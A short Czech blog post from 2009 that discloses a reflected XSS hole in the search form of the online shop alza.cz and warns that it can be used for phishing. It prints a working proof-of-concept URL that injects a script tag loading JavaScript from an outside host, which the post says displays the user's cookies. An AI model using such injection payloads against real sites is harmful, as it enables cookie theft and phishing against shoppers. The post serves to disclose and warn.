Pravidelný občasník originálního humoru

ALZA.CZ - další web s XSS zranitelností

Autor chlívek (Webdesign, Internet) - vydáno 23.5.2009


XSS (Cross Site Scripting) se stal čerstvě proslulý skrz neschopnost tvůrců webu www.cssd.cz odvést správně práci. XSS je ale hodně staré, takže ho najdete na řadě dalších webů. Na www.alza.cz můžete klasicky využít vyhledávací políčko pro hraní si. A v případě internetového obchodu je to obzvlášť nepříjemné, protože tahle zranitelnost je snadno zneužitelná pro phishing (rhybaření).

http://www.alza.cz/SearchAdvanced.asp?EXPS=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fwww.pooh.cz%2Fsecurity%2Fcss-test.js%3E&NameSearch=1&CodeSearch=1&PartNumber=1

Pokud budete mít povolené pop-up okna, zobrazí se vám nové okno s výpisem uživatelských cookies, které "získal" zcela cizí web - v tomto případě POOH.CZ. Znamenáte to ale i to, že pomocí vyhledávacího okénka je možné vsouvat libovolné skriptovací konstrukce - velmi účinný nástroj pro rhybaření a další útoky.

ALZA.CZ podporuje vajíčka ...

Štítky : Bezpečnost, XSS, Cross Site Scripting, Webdesign, Alza.cz



|
Poslední změna : 23.5.2009 21:12, Vytvořen : 23.5.2009 21:04, Vydán : 23.5.2009, 15291x

Komentáře pro ty z Facebooku

Aktuální články autora

Související články